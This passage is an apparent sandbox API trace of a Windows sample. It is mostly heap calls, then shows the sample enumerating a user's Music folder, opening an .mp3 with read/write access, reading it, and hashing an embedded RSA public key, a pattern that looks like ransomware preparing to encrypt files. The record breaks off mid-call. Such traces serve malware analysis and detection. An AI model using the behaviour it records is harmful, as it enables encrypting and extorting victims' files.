dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0192.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0192.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0192.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0192.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0192.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0192.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0192.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.740] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\") returned="iPggquG4\\" [0192.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0192.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0192.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.740] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0192.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41c38 [0192.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.740] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0192.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41c38 | out: hHeap=0x6a0000) returned 1 [0192.741] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.741] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.742] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.742] PathFindFileNameW (pszPath="") returned="" [0192.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.742] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1103610, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x6eb6c8c0, ftLastAccessTime.dwHighDateTime=0x1d89cc6, ftLastWriteTime.dwLowDateTime=0x6eb6c8c0, ftLastWriteTime.dwHighDateTime=0x1d89cc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0192.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.746] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1103610, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x6eb6c8c0, ftLastAccessTime.dwHighDateTime=0x1d89cc6, ftLastWriteTime.dwLowDateTime=0x6eb6c8c0, ftLastWriteTime.dwHighDateTime=0x1d89cc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.746] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab28cd0, ftCreationTime.dwHighDateTime=0x1d89d89, ftLastAccessTime.dwLowDateTime=0xf37be410, ftLastAccessTime.dwHighDateTime=0x1d8a6d4, ftLastWriteTime.dwLowDateTime=0xf37be410, ftLastWriteTime.dwHighDateTime=0x1d8a6d4, nFileSizeHigh=0x0, nFileSizeLow=0x18dd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="32aCzuXFDU.mp3", cAlternateFileName="32ACZU~1.MP3")) returned 1 [0192.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0192.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0192.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0192.746] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\32aCzuXFDU.mp3") returned=".mp3" [0192.747] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\32aCzuXFDU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\32aczuxfdu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.747] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=101845) returned 1 [0192.747] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.750] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18daf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.750] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.753] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.753] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x18dd5, lpOverlapped=0x0) returned 1 [0192.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.754] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0192.755] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.755] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.755] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.755] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | 